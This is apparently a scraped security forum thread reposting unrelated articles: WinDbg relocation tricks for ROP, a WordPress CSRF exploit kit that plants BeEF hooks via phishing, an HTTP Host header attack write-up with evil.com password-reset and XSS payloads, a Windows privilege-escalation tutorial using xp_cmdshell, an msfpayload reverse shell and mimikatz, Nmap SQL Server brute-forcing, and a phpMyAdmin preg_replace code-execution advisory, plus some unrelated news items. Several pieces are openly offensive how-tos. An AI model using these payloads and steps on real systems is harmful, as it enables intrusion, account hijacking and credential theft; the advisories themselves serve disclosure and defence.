uxtheme - at preferred address 0:017> .shell -ci "!imgreloc" findstr RELOCATED 00280000 sqlite3 - RELOCATED from 10000000 00300000 js3250 - RELOCATED from 10000000 004e0000 nspr4 - RELOCATED from 10000000 00510000 smime3 - RELOCATED from 10000000 00530000 nss3 - RELOCATED from 10000000 005d0000 nssutil3 - RELOCATED from 10000000 005f0000 plc4 - RELOCATED from 10000000 00600000 plds4 - RELOCATED 
from 10000000 00610000 ssl3 - RELOCATED from 10000000 00640000 xpcom - RELOCATED from 10000000 01220000 browserdirprovider - RELOCATED from 10000000 01540000 brwsrcmp - RELOCATED from 10000000 01de0000 nssdbm3 - RELOCATED from 10000000 02000000 xpsp2res - RELOCATED from 00010000 036a0000 softokn3 - RELOCATED from 10000000 03980000 freebl3 - RELOCATED from 10000000 039d0000 nssckbi - RELOCATED from 10000000 Searching for preferred instead of RELOCATED will yield a list of modules that should remain at their preferred address (and thus be usable for ROP or other such techniques). Posted by d0c.s4vage Sursa: d0c_s4vage: Windbg Tricks - Module Relocation
  4. [h=2]WordPress CSRF Exploit kit – A novel approach to exploiting WordPress plugins[/h] Over the last few weeks I’ve been on a roll with finding CSRF vulnerabilities in WordPress plugins. That’s all nice and good, but when you’ve got 30 of them, it’s a shame to not take it a step further and show the dangers of them! This project is solely designed to show off a few random thoughts of mine, and most importantly to hopefully inspire others to think along these lines. This project is solely meant for educational purposes, not for attacks against running services or people. https://github.com/CharlieEriksen/WP-CSRF-POC The project shows a few basic concepts in regards to the process of pulling off a CSRF attack against a large number of WordPress sites. Some things worth pointing out: It’s not designed to simply spray and pray. You define the target URLs you want to hit and then you have a unique URL for each blog you can go phishing with. Then it will use the onload function of an img or script tag to detect the presence of the vulnerable plugin on the target blog on request through the pre-defined unique URL. We generate the payload on request with a uniquely identifying URL to ensure it’s not easy to extract the exploits. You get max 2 requests to the script per IP. That is all a compromise needs. After that, you get nothing back. Makes researchers’ lives harder. We deliver a beef hook. Because beef is cool and god damn tasty. I want to stress especially the “novel” use of the onload function of img/script tags. People in the past have used it to detect the presence of different host-names/”port scanning” internal systems by vectoring through a hooked browser. I say that’s cool and all, but you can take that further and use it to detect the presence of a plugin on a target on demand, making you able to be much more sneaky. 
When the markup detects a plugin present on the target, it redirects the browser to the exploit, and no further requests can be made by that IP to the script. A normal series of events would be: An attacker sets up this script with pre-defined targets (targets variable) with a unique URL for each target blog The attacker then spams out a link to the running script with the unique URL for each target blog When a target clicks the link to this script, we validate that the URL contains the unique identifier that resolves to a blog URL The script then generates a random URL for each exploit we have with the target blog URL put in that can then be requested We output to the user a series of img/script tags with onload attributes that redirect to the unique URL generated in step 4. These tags look for specific plugins on the targeted blog If none of the plugins are detected on the blog, we redirect to google If any of the plugins are detected, we redirect to the uniquely generated URL made in step 4 The exploit is now written out to the user, submitting the CSRF with a XSS payload pointing to our beef instance We now delete all cached exploits made for the requesting IP There’s a number of improvements that could be made to this. It could be designed to spray and pray through iframes, but that is much much dirtier, and not the goal of this proof of concept. I urge anybody who finds the concept to be useful to run with it if they so desire. I’ll be adding more exploits as advisories are published. Otherwise, I’m curious to hear people’s thoughts on this. Sursa: Wordpress CSRF Exploit kit – A novel approach to exploiting Wordpress plugins | ceriksen.com
  5. [h=3]Practical HTTP Host header attacks[/h] [h=2][/h] [h=3]Password reset and web-cache poisoning[/h] [h=4](And a little surprise in RFC-2616)[/h] [h=3]Introduction[/h] How does a deployable web-application know where it is? Creating a trustworthy absolute URI is trickier than it sounds. Developers often resort to the exceedingly untrustworthy HTTP Host header (_SERVER["HTTP_HOST"] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it with code equivalent to: <link href="http://_SERVER['HOST']" (Joomla) ...and append secret keys and tokens to links containing it: <a href="http://_SERVER['HOST']?token=topsecret"> (Django, Gallery, others) ....and even directly import scripts from it: <script src="http://_SERVER['HOST']/misc/jquery.js?v=1.4.4"> (Various) There are two main ways to exploit this trust in regular web applications. The first approach is web-cache poisoning; manipulating caching systems into storing a page generated with a malicious Host and serving it to others. The second technique abuses alternative channels like password reset emails where the poisoned content is delivered directly to the target. In this post I'll look at how to exploit each of these in the presence of 'secured' server configurations, and how to successfully secure applications and servers. [h=3]Password reset poisoning[/h] Popular photo-album platform Gallery uses a common approach to forgotten password functionality. When a user requests a password reset it generates a (now) random key: Places it in a link to the site: and emails it to the address on record for that user. [Full code] When the user visits the link, the presence of the key proves that they can read content sent to the email address, and thus must be the rightful owner of the account. 
The vulnerability was that url::abs_site used the Host header provided by the person requesting the reset, so an attacker could trigger password reset emails poisoned with a hijacked link by tampering with their Host header: > POST /password/reset HTTP/1.1 > Host: evil.com > ... > csrf=1e8d5c9bceb16667b1b330cc5fd48663&name=admin This technique also worked on Django, Piwik and Joomla, and still works on a few other major applications, frameworks and libraries that I can't name due to an unfortunate series of mistakes on my part. Of course, this attack will fail unless the target clicks the poisoned link in the unexpected password reset email. There are some techniques for encouraging this click but I'll leave those to your imagination. In other cases, the Host may be URL-decoded and placed directly into the email header allowing mail header injection. Using this, attackers can easily hijack accounts by BCCing password reset emails to themselves - Mozilla Persona had an issue somewhat like this, back in alpha. Even if the application's mailer ignores attempts to BCC other email addresses directly, it's often possible to bounce the email to another address by injecting \r\nReturn-To: attacker@evil.com followed by an attachment engineered to trigger a bounce, like a zip bomb. [h=3]Cache poisoning[/h] Web-cache poisoning using the Host header was first raised as a potential attack vector by Carlos Beuno in 2008. 5 years later there's no shortage of sites implicitly trusting the host header so I'll focus on the practicalities of poisoning caches. 
Such attacks are often difficult as all modern standalone caches are Host-aware; they will never assume that the following two requests reference the same resource: > GET /index.html HTTP/1.1 > GET /index.html HTTP/1.1 > Host: example.com > Host: evil.com So, to persuade a cache to serve our poisoned response to someone else we need to create a disconnect between the host header the cache sees, and the host header the application sees. In the case of the popular caching solution Varnish, this can be achieved using duplicate Host headers. Varnish uses the first host header it sees to identify the request, but Apache concatenates all host headers present and Nginx uses the last host header. This means that you can poison a Varnish cache with URLs pointing at evil.com by making the following request: > GET / HTTP/1.1 > Host: example.com > Host: evil.com Application-level caches can also be susceptible. Joomla writes the Host header to every page without HTML-encoding it, and its cache is entirely oblivious to the Host header. Gaining persistent XSS on the homepage of a Joomla installation was as easy as: curl -H "Host: cow\"onerror='alert(1)'rel='stylesheet'" http://example.com/ | fgrep cow\" This will create the following request: > GET / HTTP/1.1 > Host: cow"onerror='alert(1)'rel='stylesheet' The response should show a poisoned <link> element: <link href="http://cow"onerror='alert(1)'rel='stylesheet'/" rel="canonical"/> To verify that the cache has been poisoned, just load the homepage in a browser and observe the popup. [h=3]'Secured' configurations[/h] So far I've assumed that you can make a HTTP request with an arbitrary Host header arrive at any application. Given that the intended purpose of the Host header is to ensure that a request is passed to the correct application at a given IP address, it's not always that simple. Sometimes it is trivial. If Apache receives an unrecognized Host header, it passes it to the first virtual host defined in httpd.conf. 
As such, it's possible to pass requests with arbitrary host headers directly to a sizable number of applications. Django was aware of this default-vhost risk and responded by advising that users create a dummy default-vhost to act as a catchall for requests with unexpected Host headers, ensuring that Django applications never got passed requests with unexpected Host headers. The first bypass for this used X-Forwarded-For's friend, the X-Forwarded-Host header, which effectively overrode the Host header. Django was aware of the cache-poisoning risk and fixed this issue in September 2011 by disabling support for the X-Forwarded-Host header by default. Mozilla neglected to update addons.mozilla.org, which I discovered in April 2012 with the following request: > POST /en-US/firefox/user/pwreset HTTP/1.1 > Host: addons.mozilla.org > X-Forwarded-Host: evil.com Even patched Django installations were still vulnerable to attack. Webservers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful http://username:password@domain.com syntax: > POST /en-US/firefox/user/pwreset HTTP/1.1 > Host: addons.mozilla.org:@passwordreset.net This resulted in the following (admittedly suspicious) password reset link: https://addons.mozilla.org:@passwordreset.net/users/pwreset/3f6hp/3ab-9ae3db614fc0d0d036d4 If you click it, you'll notice that your browser sends the key to passwordreset.net before creating the suspicious URL popup. Django released a patch for this issue shortly after I reported it: https://www.djangoproject.com/weblog/2012/oct/17/security/ Unfortunately, Django's patch simply used a blacklist to filter @ and a few other characters. 
As the password reset email is sent in plaintext rather than HTML, a space breaks the URL into two separate links: > POST /en-US/firefox/users/pwreset HTTP/1.1 > Host: addons.mozilla.org: www.securepasswordreset.com Django's followup patch ensured that the port specification in the Host header could only contain numbers, preventing the port-based attack entirely. However, the arguably ultimate authority on virtual hosting, RFC2616, has the following to say: 5.2 The Resource Identified by a Request [...] If Request-URI is an absoluteURI, the host is part of the Request-URI. Any Host header field value in the request MUST be ignored. The result? On Apache and Nginx (and all compliant servers) it's possible to route requests with arbitrary host headers to any application present by using an absolute URI: > POST https://addons.mozilla.org/en-US/firefox/users/pwreset HTTP/1.1 > Host: evil.com This request results in a SERVER_NAME of addons.mozilla.org but a HTTP['HOST'] of evil.com. Applications that use SERVER_NAME rather than HTTP['HOST'] are unaffected by this particular trick, but can still be exploited on common server configurations. See HTTP_HOST vs. SERVER_NAME for more information on the difference between these two variables. Django fixed this in February 2013 by enforcing a whitelist of allowed hosts. See the documentation for more details. However, these attack techniques still work fine on many other web applications. [h=3]Securing servers[/h] Due to the aforementioned absolute request URI technique, making the Host header itself trustworthy is almost a lost cause. What you can do is make SERVER_NAME trustworthy. This can be achieved under Apache (instructions) and Nginx (instructions) by creating a dummy vhost that catches all requests with unrecognized Host headers. It can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on. 
I'd recommend using both approaches wherever possible. A patch for Varnish should be released shortly. As a workaround until then, you can add the following to the config file: import std; sub vcl_recv { collect(req.http.host); } [h=3]Securing applications[/h] Fixing this issue is difficult, as there is no entirely automatic way to identify which host names the administrator trusts. The safest, albeit mildly inconvenient solution, is to use Django's approach of requiring administrators to provide a whitelist of trusted domains during the initial site setup process. If that is too drastic, at least ensure that SERVER_NAME is used instead of the Host header, and encourage users to use a secure server configuration. [h=3]Further research[/h] More effective / less inconvenient fixes Automated detection Exploiting wildcard whitelists with XSS & window.history Exploiting multipart password reset emails by predicting boundaries Better cache fuzzing (trailing Host headers?) Thanks to Mozilla for funding this research via their bug-bounty program, Varnish for the handy workaround, and the teams behind Django, Gallery, and Joomla for their speedy patches. Feel free to drop a comment, email or DM me if you have any observations or queries. Sursa: http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
  6. [h=1]Sagan v0.3.0 Released[/h] Sagan is an open source (GNU/GPLv2) high performance, real-time log analysis & correlation engine that runs under *nix operating systems (Linux/FreeBSD/ OpenBSD/etc). It is written in C and uses a multi-threaded architecture to deliver high performance log & event analysis. Sagan’s structure and rules work similarly to the Sourcefire “Snort” IDS/IPS engine. This was intentionally done to maintain compatibility with rule management software (oinkmaster/pulledpork /etc) and allows Sagan to correlate log events with your Snort IDS/IPS system. Sagan can also write to Snort IDS/IPS databases via Unified2/Barnyard2. Sagan is compatible with all Snort “consoles”. For example, Sagan will work with Snorby (http://www.snorby.org), Sguil (http://sguil.sourceforge.net), BASE, the Prelude IDS framework (https://www.prelude-ids.org) and proprietary consoles! (to name a few). [h=3]Changelog v0.3.0[/h] The biggest change is that Sagan is now capable of utilizing all CPUs/cores. While Sagan has always been multi-threaded to prevent I/O blocking, previous versions could only utilize one core for event analysis. This is no longer the case – Sagan will now use any and all CPUs available, which means that Sagan can digest, parse and analyze an even higher number of events per second. Introduction of “processors.” Processors provide Sagan the ability to analyze logs using methods other than traditional signature based technology. Current Processors are: Blacklist – Search log messages for blacklisted IP addresses. Search – Search logs for keyword terms (i.e. domain names, etc.) Track Clients – Informs you when systems aren’t logging properly. Websense Threatseeker – Queries the Websense Threatseeker network for reputation data (Not included with the GPLv2 release). More processors are currently in development. The direct SQL output plugin has been removed, in order to maintain full compatibility with Snort. 
To write to a SQL database, use Unified2 output and Barnyard2. Introduction of port variables ($SSH_PORT, $DNS_PORT) in rules. More normalization and parsing options (parse_src_ip, parse_proto, etc). Sagan currently has over five thousand signatures/rules. More Information: here Download Sagan v0.3.0 Sursa: Sagan v0.3.0 Released | ToolsWatch.org - The Hackers Arsenal Tools | Repository for vFeed and DPE Projects
  7. [h=1]Aging networking protocols abused in DDoS attacks[/h][h=2]Printers, routers and many other Internet-connected devices can be used in an attack[/h][h=3]By Jeremy Kirk[/h] May 01, 2013 — IDG News Service — Aging networking protocols still employed by nearly every Internet-connected device are being abused by hackers to conduct distributed denial-of-service (DDoS) attacks. Security vendor Prolexic found that attackers are increasingly using the protocols for what it terms "distributed reflection denial-of-service attacks" (DrDos), where a device is tricked into sending a high volume of traffic to a victim's network. "DrDos protocol reflection attacks are possible due to the inherent design of the original architecture," Prolexic wrote in a white paper. "When these protocols were developed, functionality was the main focus, not security." Government organizations, banks and companies are targeted by DDoS attacks for a variety of reasons. Hackers sometimes use DDoS attacks to draw attention away from other mischief or want to disrupt an organization for political or philosophical reasons. One of the targeted protocols, known as Network Time Protocol (NTP), is used in all major operating systems, network infrastructure and embedded devices, Prolexic wrote. It is used to synchronize clocks among computers and servers. A hacker can launch an attack against NTP by sending many requests for updates. By spoofing the origin of the requests, the NTP responses can be directed at a victim host. It appears the attackers are abusing a monitoring function in the protocol called NTP mode 7 (monlist). The gaming industry has been targeted by this style of attack, Prolexic said. Other network devices, such as printers, routers, IP video cameras and a variety of other Internet-connected equipment use an application layer protocol called Simple Network Management Protocol (SNMP). 
SNMP communicates data about device components, Prolexic wrote, such as measurements or sensor readings. SNMP devices return three times as much data as when they're pinged, making them an effective way to attack. Again, an attacker will send a spoofed IP request to an SNMP host, directing the response to a victim. Prolexic wrote there are numerous ways to mitigate an attack. The best advice is to disable SNMP if it is not needed. The U.S. Computer Emergency Readiness Team warned administrators in 1996 of a potential attack scenario involving another protocol, Character Generator Protocol, or CHARGEN. It is used as a debugging tool since it sends data back regardless of the input. But Prolexic wrote that it "may allow attackers to craft malicious network payloads and reflect them by spoofing the transmission source to effectively direct it to a target. This can result in traffic loops and service degradation with large amounts of network traffic." CERT recommended at that time to disable any UDP (User Datagram Protocol) service such as CHARGEN if it isn't needed. Sursa: Aging networking protocols abused in DDoS attacks - CSO Online - Security and Risk
  8. [h=1]Facebook Q1 Earnings: Striking Mobile Revenue Growth[/h]May 1st, 2013, 20:37 GMT · By Gabriela Vatu Facebook has barely exceeded estimates and reported revenues of $1.458 billion (€1.105 billion) for the first quarter of 2013 and it also announced a 54% increase in mobile revenues. The company has published their first quarterly results of 2013. Overall, Facebook's revenues exceeded the $1.44 billion (€1.09 billion) estimates of Wall Street specialists. The social network also brought in over $751 million (€570 million) in mobile revenue in the first quarter, which is a 54% increase year-over-year. This has been extremely important to investors over the past year, so such an increase in this division is expected to cause a rise in stock prices for Facebook. Out of the company’s overall result for the first three months, 85% came from advertising. Facebook has managed to garner $1.25 billion (€0.94 billion) by selling ads, which is 43% more than last year. Mobile ads also played an important part, as they represented 30% of the total ad revenue, which is over Wall Street expectations. Facebook’s net income for the first quarter was $219 million (€166 million), a small increase over last year’s results, when they had profits of $205 million (€155 million). The social network giant also announced that they have cash and marketable securities of $9.5 billion (€7.2 billion) at the end of the quarter. “We’ve made a lot of progress in the first few months of the year,” Mark Zuckerberg, Facebook CEO said at the conference. He continued by saying that they’ve seen strong growth and engagement across the community, as well as launched several exciting products. Facebook's daily active users number also increased by 26% over the last year, up to 665 million on average in March. The monthly active users number also grew significantly, reaching 1.11 billion. This represents a 23% increase over last year. 
David Spillane, Facebook’s Chief Accounting Officer has announced that he will be leaving the company. Sursa: Facebook Q1 Earnings: Striking Mobile Revenue Growth - Softpedia
  9. http://www.youtube.com/watch?v=ghC_UCavA5o&feature=share
  10. 242 rows affected. ( Query took 0.0078 sec )
  11. [h=3]Hacking Windows Servers - Privilege Escalation [/h] Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks. But, these get the job done only on Linux servers. What about windows servers? Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges. Using "sa" account to execute commands by MSSQL query via 'xp_cmdshell' stored procedure. Using meterpreter payload to get a reverse shell over the target machine. Using browser_autopwn. (Really...) Using other tools like pwdump7, mimikatz, etc. Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above. 1. Using xp_cmdshell- Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work. If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website. You must be wondering why only "sa"? Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server. The picture below shows the connection string containing login credentials of "sa" account. Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path. So, after getting the "sa" account, we can login remotely using HeidiSQL HeidiSQL is an awesome tool to connect to remote database servers. You can download it here. After logging into MSSQL server with sa account, we get a list of databases and their contents. Now we can execute commands using MSSQL queries via xp_cmdshell. 
(With administrator privileges) Syntax for the query is- xp_cmdshell '[command]' For example, if I need to know my current privileges, I would query- xp_cmdshell 'whoami' This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy. Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP. Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online. 2. Meterpreter Payload- This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands. Using metasploit, generate a reverse shell payload binary. For example- msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe Now we will upload this executable to the server using our web backdoor. Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly) Now it's time to execute the payload. If everything goes right, we will get a meterpreter session over the target machine as shown below- We can also use php, asp or other payloads. 3. Browser Autopwn- This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment. Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands. I think it is clear by now what I'm trying to explain. We can start Internet Explorer from command line and make it browse to a specific URL. Syntax for this- iexplore.exe Where URL would be our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection. 4. Using readily available tools- Tools like pwdump and mimikatz can crack passwords of windows users. 
#pwdump7 gives out the NTLM hashes of the users which can be cracked further using John the Ripper. The following screenshot shows NTLM hashes from pwdump7: #mimikatz is another great tool which extracts the plain text passwords of users from lsass.exe. The tool is some language other than English so do watch tutorials on how to use it. Following picture shows plain text passwords from mimikatz: You can google about them and learn how to use these tools and what actually they exploit to get the job done for you. I hope you can now exploit every another windows server. Happy Hacking About The Author This article has been written by Deepankar Arora, He is an independent security researcher from India, He has been listed in various hall of fames. Sursa: Hacking Windows Servers - Privilege Escalation | Learn How To Hack - Ethical Hacking and security tips
  12. [h=1]Tor calls for help as its supply of bridges falters[/h][h=2]Bridges help users in countries like China and Iran access the network.[/h] by Sean Gallagher - Apr 17 2013, 7:23pm GTBDT Just like the US highway infrastructure, Tor needs new bridges. The encrypted anonymizing "darknet" that allows activists, journalists, and others to access the Internet without fear of censorship or monitoring—and which has also become a favored technology of underground groups like child pornographers—is having increasing difficulty serving its users in countries that have blocked access to Tor's entry points. Tor bridges are computers that act as hidden gateways to Tor's darknet of relays. After campaigning successfully last year to get more volunteers to run obfuscated Tor bridges to support users in Iran trying to evade state monitoring, the network has lost most of those bridges, according to a message to the Tor relays mailing list by Tor volunteer George Kadiankakis. "Most of those bridges are down, and fresh ones are needed more than ever," Kadiankakis wrote in an e-mail, "since obfuscated bridges are the only way for people to access Tor in some areas of the world (like China, Iran, and Syria)." Obfuscated bridges allow users to connect to the Tor network without using one of the network's known public bridges or relays as an initial entry point. Obfuscated bridges have become a necessity for Tor users in countries with networks guarded by various forms of deep packet inspection technology, where censors have put in place filters that spot traffic matching the signature of a Tor-protected connection. Some of these censors use a blocking list for traffic to known Tor bridges. To circumvent detection, Tor users can use a plugin called a "pluggable transport" to connect to an obfuscated bridge and mask their network signature. 
To further evade potential censoring, the addresses for obfuscated bridges are not part of Tor's main directory but are stored in a distributed database called BridgeDB. The BridgeDB's interface spoons out addresses two at a time per request in an effort to prevent attacks to expose a full list, and no BridgeDB instance keeps a full list of the available bridges. Additionally, Tor provides "unpublished" bridge addresses to users who request them via e-mail. The Tor Project's support assistants—volunteers who respond to support requests—only respond to requests to e-mails from Gmail and Yahoo e-mail accounts to both deal with the flood of requests and reduce the chance that an attacker will be able to learn the addresses of a large number of bridges. The problem for Tor is that those bridges do get detected by attackers over time, and pluggable transports can eventually be detected. The most widely used pluggable transport in the Tor network, obfs2, no longer works in China. A new plugin, obfs3, will work in China, but it runs only on the latest version of the obfuscated bridge proxy—which was recently rewritten in Python. "Looking into BridgeDB," Kadiankakis wrote in his message to the Tor community, "we have 200 obfs2 bridges, but only 40 obfs3 bridges: this means that we need more people running the new Python obfsproxy! Upgrading obfsproxy should be easy now, since we prepared new instructions and Debian/Ubuntu packages." He added that there is also a particular need for more unpublished bridges. For those who want to donate bridges to the Tor network, the easiest route is to use Tor Cloud, an Amazon Web Service Elastic Compute Cloud image created by the Tor Project that allows people to leverage Amazon's free usage tier to deploy a bridge. Sursa: http://arstechnica.com/information-technology/2013/04/tor-calls-for-help-as-its-supply-of-bridges-falters/
  13. [C] Love letter (obfuscated C contest 1990) char*lie; double time, me= !0XFACE, not; int rested, get, out; main(ly, die) char ly, **die ;{ signed char lotte, dear; (char)lotte--; for(get= !me;; not){ 1 - out & out ;lie;{ char lotte, my= dear, **let= !!me *!not+ ++die; (char*)(lie= "The gloves are OFF this time, I detest you, snot\n\0sed GEEK!"); do {not= *lie++ & 0xF00L* !me; #define love (char*)lie - love 1s *!(not= atoi(let [get -me? (char)lotte- (char)lotte: my- *love - 'I' - *love - 'U' - 'I' - (long) - 4 - 'U' ])- !! (time =out= 'a'));} while( my - dear && 'I'-1l -get- 'a'); break;}} (char)*lie++; (char)*lie++, (char)*lie++; hell:0, (char)*lie; get *out* (short)ly -0-'R'- get- 'a'^rested; do {auto*eroticism, that; puts(*( out - 'c' -('P'-'S') +die+ -2 ));}while(!"you're at it"); for (*((char*)&lotte)^= (char)lotte; (love ly) [(char)++lotte+ !!0xBABE]{ if ('I' -lie[ 2 +(char)lotte]){ 'I'-1l ***die; } else{ if ('I' * get *out* ('I'-1l **die[ 2 ])) *((char*)&lotte) -= '4' - ('I'-1l); not; for(get=! get; !out; (char)*lie & 0xD0- !not) return!! (char)lotte;} (char)lotte; do{ not* putchar(lie [out *!not* !!me +(char)lotte]); not; for(;!'a';}while( love (char*)lie);{ register this; switch( (char)lie [(char)lotte] -1s *!out) { char*les, get= 0xFF, my; case' ': *((char*)&lotte) += 15; !not +(char)*lie*'s'; this +1s+ not; default: 0xF +(char*)lie;}}} get - !out; if (not--) goto hell; exit( (char)lotte);} Sursa: http://www0.us.ioccc.org/1990/westley.c PS: E posibil sa primiti o eroare cu invalid suffix "s". Puneti si voi "L" sau "5" in locul acelui "s".
  14. Pen Testing SQL Servers With Nmap The Nmap Scripting Engine has transformed Nmap from a regular port scanner into a penetration testing machine. With the variety of scripts that exist so far, we can even perform a full penetration test of an SQL database without the need for any other tool. In this tutorial we will have a look at these scripts, what kind of information they extract from the database, and how we can exploit the SQL server and execute system commands through Nmap. Most SQL databases run on port 1433, so in order to discover information regarding the database we need to execute the following script: Obtain SQL Information – Nmap So we already have the database version and the instance name. The next step is to check whether there is a weak password for authentication with the database. In order to achieve that we need to run the following nmap script, which will perform a brute force attack. Brute Force Weak MS-SQL Accounts – Nmap As we can see, in this case we didn’t discover any credentials. If we want, we can use this script with our own username and password lists in order to discover a valid database account with this command: nmap -p1433 –script ms-sql-brute –script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt However, we can always try another script which can check for the existence of null passwords on Microsoft SQL Servers. Check For Null passwords on SA accounts – Nmap Now we know that the sa account does not have a password. We can use this information in order to connect to the database directly or to continue executing further Nmap scripts that require valid credentials. If we want to know which databases the sa account, or any other account that we have discovered, has access to, we can run the ms-sql-hasdbaccess script with the following arguments: Discover which user has access to which db – Nmap We can even query the Microsoft SQL Server via Nmap in order to obtain the database tables. 
List Tables – Nmap In SQL Server 2000, xp_cmdshell is enabled by default, so we can even execute operating system commands through Nmap scripts, as can be seen in the image below: Run OS command via xp_cmdshell – Nmap Run net users via xp_cmdshell – Nmap Last but not least, we can run a script to extract the database password hashes for cracking with tools like John the Ripper. Dump MS-SQL hashes – Nmap In this case we didn’t have any hashes because there was only one account on the database, the sa account, which has a null password. Sursa: Pen Testing SQL Servers With Nmap | Penetration Testing Lab
  15. Nytro

    PeStudio

    PeStudio [TABLE=class: fborder] [TR] [TD=class: fcaption, colspan: 2, align: left]PeStudio 6.70 [/TD] [/TR] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Marc Ochsenmeier[/TD] [/TR] [TR] [TD=class: forumheader3]Author email[/TD] [TD=class: forumheader3] info©winitor.com[/TD] [/TR] [TR] [TD=class: forumheader3]Author website[/TD] [TD=class: forumheader3]winitor[/TD] [/TR] [TR] [TD=class: forumheader3]Description[/TD] [TD=class: forumheader3]PeStudio is a free tool which can be used to perform static analysis of any Windows application and reveals not only Raw-data, but also Indicators of Trust. Executable files analyzed with PeStudio are never started. For this reason, you can analyze suspicious applications with PeStudio with no risk! Depending on how it is started PeStudio has a Graphical User Interface (GUI) or a Character-Based User Interface (CUI), which is especially useful when performing batch-mode oriented parsing of executable files. PeStudio has a set of unique features like looking-up for the image being analyzed on Virustotal, the possibility to start new instances of PeStudio with the dependencies of the image. PeStudio does a RAW access to the data of the Windows Portable Executable format. No Windows API is used to gather elements. A feature which is also unique to PeStudio is the ability to create an XML report of the image being analyzed.[/TD] [/TR] [TR] [TD=class: forumheader3]Image[/TD] [TD=class: forumheader3]no image available [/TD] [/TR] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]380 kB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 23 April 2013 - 08:56:45[/TD] [/TR] [TR] [TD=class: forumheader3]Downloads[/TD] [TD=class: forumheader3]86[/TD] [/TR] [TR] [TD=class: forumheader3]Download[/TD] [TD=class: forumheader3] [/TD] [/TR] [/TABLE] Sursa: PeStudio 6.70 / Portable Executable Tools / Downloads - Tuts 4 You
  16. [h=1]phpMyAdmin 3.5.8 and 4.0.0-RC2 - Multiple Vulnerabilities[/h] [waraxe-2013-SA#103] - Multiple Vulnerabilities in phpMyAdmin =============================================================================== Author: Janek Vind "waraxe" Date: 25. April 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-103.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. http://www.phpmyadmin.net/home_page/index.php ############################################################################### 1. Remote code execution via preg_replace() in "libraries/mult_submits.inc.php" ############################################################################### Reason: 1. insufficient sanitization of user data before using in preg_replace Attack vectors: 1. user-supplied parameters "from_prefix" and "to_prefix" Preconditions: 1. logged in as valid PMA user 2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in regex) PMA security advisory: PMASA-2013-2 CVE id: CVE-2013-3238 Affected phpMyAdmin versions: 3.5.8 and 4.0.0-RC2 Result: PMA user is able to execute arbitrary PHP code on webserver Let's take a look at the source code: Php script "libraries/mult_submits.inc.php" line 426 (PMA version 3.5.8): ------------------------[ source code start ]---------------------------------- case 'replace_prefix_tbl': $current = $selected[$i]; $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current); $a_query = 'ALTER TABLE ' . PMA_backquote($selected[$i]) . ' RENAME ' . PMA_backquote($newtablename) ; // CHANGE PREFIX PATTERN $run_parts = true; break; case 'copy_tbl_change_prefix': $current = $selected[$i]; $newtablename = preg_replace("/^" . $from_prefix . 
"/", $to_prefix, $current); $a_query = 'CREATE TABLE ' . PMA_backquote($newtablename) . ' SELECT * FROM ' . PMA_backquote($selected[$i]) ; // COPY TABLE AND CHANGE PREFIX PATTERN $run_parts = true; break; ------------------------[ source code end ]------------------------------------ We can see, that PHP variables "$from_prefix" and "$to_prefix" are used in preg_replace function without any sanitization. It appears, that those variables are coming from user submitted POST request as parameters "from_prefix" and "to_prefix". It is possible to inject e-modifier with terminating null byte via first parameter and php code via second parameter. In case of successful exploitation injected PHP code will be executed on PMA webserver. Tests: 1. Log in to PMA and select database: http://localhost/PMA/index.php?db=test&token=25a6ce9e288070bd28c3f9aebffad1b8 2. select one table from database by using checkbox and then select "Replace table prefix" from select control "With selected:". 3. We can see form named "Replace table prefix:" with two input fields. Type "/e%00" to the "From" field and "phpinfo()" to the "To" field. 4. Activate Tamper Data Firefox add-on: https://addons.mozilla.org/en-us/firefox/addon/tamper-data/ 5. Click "Submit", Tamper Data pops up, choose "Tamper". 6. Now we can modify POST request. Look for parameter "from_prefix". It should be "%2Fe%2500", remove "25", so that it becomes "%2Fe%00". Click "OK" and Firefox will send out manipulated POST request. 7. We are greeted by phpinfo function output - code execution is confirmed. PMA version 4.0.0-RC2 contains almost identical vulnerability: Php script "libraries/mult_submits.inc.php" line 482 (PMA version 4.0.0-RC2): ------------------------[ source code start ]---------------------------------- case 'replace_prefix_tbl': $current = $selected[$i]; $newtablename = preg_replace("/^" . $_POST['from_prefix'] . "/", $_POST['to_prefix'], $current); $a_query = 'ALTER TABLE ' . PMA_Util::backquote($selected[$i]) . 
